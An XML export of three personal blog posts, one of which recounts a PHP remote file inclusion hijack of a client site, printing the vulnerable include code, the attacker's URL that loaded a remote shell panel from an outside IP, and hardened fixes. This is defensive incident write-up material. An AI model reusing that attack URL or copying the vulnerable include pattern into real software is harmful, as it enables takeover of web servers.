<?xml version="1.0" encoding="UTF-8"?>
<entries type="array">
  <entry>
    <body>The Kansas City Royals are having a great season.  Especially in light of "recent history":http://en.wikipedia.org/wiki/Kansas_City_Royals#2002.E2.80.932006:_Rock_bottom.  One of the fringe benefits of their winning season is the almost constant availability of "cheap turkey sub sandwiches at Planet Sub":http://kansascity.royals.mlb.com/kc/ticketing/ways_to_win.jsp#planetsub.  For the uninitiated, Planet Sub offers $2 turkey subs on the day after a Royals win -- home or away.

Well, the night of the Royals home opener, I had an idea.  The Royals play a lot of games in a season.  So when it comes lunch time, it's hard to always know whether the team won the day before.  So I spent about an hour and a half in front of my computer and conceived "Two Dollar Turkey":http://www.twodollarturkey.com, aka "http://www.twodollarturkey.com":http://www.twodollarturkey.com.

I don't manually update the site.  It runs itself.  Every day, it just goes and reads yesterday's sports scores and displays whether or not the Royals won -- Yes or No.

I hope this feat of technological wonder enhances your world (and your lunch).</body>
    <comments-count type="integer">0</comments-count>
    <comments-open type="boolean">true</comments-open>
    <created-at type="datetime">2009-05-28T15:07:12-07:00</created-at>
    <entry-class>article</entry-class>
    <feature type="boolean">false</feature>
    <id type="integer">20</id>
    <noborder type="boolean">false</noborder>
    <permalink>two-dollar-turkey</permalink>
    <published type="boolean">true</published>
    <published-at type="datetime">2009-05-28T15:22:50-07:00</published-at>
    <title>Two Dollar Turkey</title>
    <updated-at type="datetime">2009-06-18T15:36:21-07:00</updated-at>
    <user-id type="integer" nil="true"></user-id>
  </entry>
  <entry>
    <body>&lt;img src="http://joncrawford.com/system/images/php.gif" class="photoleft" style="background:0;" /&gt; A panicked client of mine contacted me today with concerns about his website.  Every few times we would load his company's homepage, it would show an incorrect website.  This site had links to p0rn and other subject matter that a fine business would deem unfit to put on the front page of its website.  &lt;a href="http://skitch.com/newmonarch/j254/not-the-correct-website" target="_blank"&gt;See the page that was being maliciously loaded here&lt;/a&gt;. So I got to work hunting down the source of the hijack.  
=more=
With some help from the gurus at "HostGator":http://hostgator.com support, I finally found out how this was happening.  The answer: RFI ("Remote File Inclusion") Attack.  

Most of our small websites we do in PHP.  I pass off all of my PHP work to my code monkeys these days.  The benefits and sanity that come from Ruby on Rails make it almost impossible for me to even look at PHP without feeling dizzy.  The developer for this site unwittingly used a small piece of vulnerable code that basically allowed any hacker to make the website his own personal playground.  

h3. Vulnerable Code

&lt;notextile&gt;
&lt;pre lang="php"&gt;
&lt;?php
# example http://bellchem.com/products.php?page=tech
# example http://bellchem.com/products.php?page=nutrition
# $page comes straight from the query string with no validation,
# so it can name a remote URL just as easily as a local file.
$page = $_GET['page'];
include $page . ".php";
&lt;/pre&gt;
&lt;/notextile&gt;

What a lot of PHP developers don't know is that the &lt;code&gt;include()&lt;/code&gt; function will also accept a remote file.  So one could write &lt;code&gt;include('http://apple.com');&lt;/code&gt;, for instance, and insert the code from Apple's website into the body of their own site.  And to take it one step further, the function doesn't just include remote content; it also *EXECUTES* the included code.

This means that with a hole like this in your code, a hacker could write any PHP script they wanted to and then just include it in your URL and *_your web server will run it!_*  And that's exactly what our hacker did.

h3. Malicious URL Used By Hacker

&lt;pre&gt;http://website.com/products.php?page=http://141.84.238.34/.../cmd?&lt;/pre&gt;


Upon including "http://141.84.238.34/.../cmd?" at the end of the URL, it loaded up a simple yet impressive file management panel right in the middle of my beautiful website. &lt;a href="http://skitch.com/newmonarch/j255/malicious-upload-form-exploit" target="_blank"&gt;Take a look&lt;/a&gt;.  It's really quite impressive.  As you can see, from here the attacker can completely manipulate the entire filesystem and even execute shell commands on the server.  This attacker used the opportunity to redirect to a site in whose advertising revenue he or she must have had some interest.  

Well, the password has been changed and the vulnerability has been closed.  I'm sure there is more than one way to secure this hole, but here is how I did it.

h3. Cleaned Up Version &lt;span class="quiet small"&gt;Won't execute remote code&lt;/span&gt;

&lt;notextile&gt;
&lt;pre lang="php"&gt;
&lt;?php
$page = $_GET['page'];
# Checks to see if the file even exists locally before loading it.
if (file_exists("./$page.php")) include "./$page.php";
else echo "There has been a problem.";
&lt;/pre&gt;
&lt;/notextile&gt;
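
The &lt;code&gt;file_exists&lt;/code&gt; check keeps a URL out of &lt;code&gt;include&lt;/code&gt;, but the parameter can still name any local &lt;code&gt;.php&lt;/code&gt; file the web server can read, including files outside the intended directory via &lt;code&gt;../&lt;/code&gt; segments. A stricter approach is to never treat the parameter as a path at all and instead map it onto a fixed list of known files. The following is an added example, not the post's own code or the fix applied to the client site; the page names and the &lt;code&gt;./pages/&lt;/code&gt; directory are assumptions:

```php
&lt;?php
// Added example, not the original post's code: resolve the "page" parameter
// through an allowlist instead of trusting it as a path.
// Assumed layout: the allowed files live in ./pages/ next to this script.

$allowed_pages = array(
    'tech'      => 'tech.php',
    'nutrition' => 'nutrition.php',
);

// Returns the absolute path of the allowed file, or null if the request
// is not one of the known page names or resolves outside $base_dir.
function resolve_page($requested, array $allowed, $base_dir)
{
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;          // unknown name, a URL, or "../" style input
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($base === false || $path === false) {
        return null;          // directory or file missing on disk
    }
    // Defence in depth: the resolved file must still sit inside $base_dir.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = isset($_GET['page']) ? $_GET['page'] : 'tech';
$file = resolve_page($page, $allowed_pages, __DIR__ . '/pages');

if ($file === null) {
    header('HTTP/1.1 404 Not Found');
    echo 'There has been a problem.';
} else {
    include $file;
}
```

Because the user-supplied value is only ever used as an array key, neither a remote URL nor a relative path can reach &lt;code&gt;include&lt;/code&gt;; the &lt;code&gt;realpath&lt;/code&gt; comparison is a second line of defence in case the table is later filled from a less trusted source. Independently of the code, the &lt;code&gt;allow_url_include&lt;/code&gt; php.ini setting (Off by default since PHP 5.2.0) stops &lt;code&gt;include&lt;/code&gt; from fetching URLs at all, and is worth confirming on any shared host.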

&lt;span class="small quiet"&gt;The full dish: "RFI Attack on Wikipedia":http://en.wikipedia.org/wiki/Remote_File_Inclusion&lt;/span&gt;</body>
    <comments-count type="integer">0</comments-count>
    <comments-open type="boolean">false</comments-open>
    <created-at type="datetime">2008-04-17T22:20:13-07:00</created-at>
    <entry-class>article</entry-class>
    <feature type="boolean">false</feature>
    <id type="integer">6</id>
    <noborder type="boolean">false</noborder>
    <permalink>nasty-php-exploit-rears-its-ugly-head-rfi-attack</permalink>
    <published type="boolean">true</published>
    <published-at type="datetime">2008-04-17T23:50:29-07:00</published-at>
    <title>Nasty PHP Exploit Rears Its Ugly Head (RFI Attack)</title>
    <updated-at type="datetime">2009-12-15T11:38:51-08:00</updated-at>
    <user-id type="integer" nil="true"></user-id>
  </entry>
  <entry>
    <body>After being online for only a few short days, I started to really hate the design of this website. It was too dark or something. I wanted it to feel more open and easy-going and it just plain didn't.  I promised to stop messing with it for a while now though.

I also added "Gravatar":http://gravatar.com integration for comments. A Gravatar is a "globally recognizable avatar".  It's a central server for avatars.  My website calls out to the Gravatar server and looks a commenter up by their email address.  If they've registered with Gravatar, their photo will be returned and placed neatly next to their comment.  If they haven't registered they'll get an ugly Gravatar logo next to their comment.  Neat, huh?  Registering is easy and fast, and more and more sites are starting to use the service.  So "go register":http://en.gravatar.com/.
=more=
Plugging Gravatar into Rails was unbelievably simple.  I just grabbed the "Gravatar plugin":http://gravatarplugin.rubyforge.org and wrote this line where the picture should go:&lt;pre&gt;
&lt;%= gravatar_for comment.email %&gt;
&lt;/pre&gt; and BLAM.  Hello Gravatar!

h3. Features still to add to site:

* Syntax highlighting for code.
* Different formatting for different entry types. (Posts, Quotes, Links)
* Some kind of unnecessary javascript effect to impress site-comers.</body>
    <comments-count type="integer">0</comments-count>
    <comments-open type="boolean">true</comments-open>
    <created-at type="datetime">2008-04-11T09:29:25-07:00</created-at>
    <entry-class>article</entry-class>
    <feature type="boolean">false</feature>
    <id type="integer">3</id>
    <noborder type="boolean">false</noborder>
    <permalink>design-changed-gravatars-added</permalink>
    <published type="boolean">true</published>
    <published-at type="datetime">2008-04-11T13:52:19-07:00</published-at>
    <title>Design Changed, Gravatars Added</title>
    <updated-at type="datetime">2009-05-08T07:47:46-07:00</updated-at>
    <user-id type="integer" nil="true"></user-id>
  </entry>
</entries>
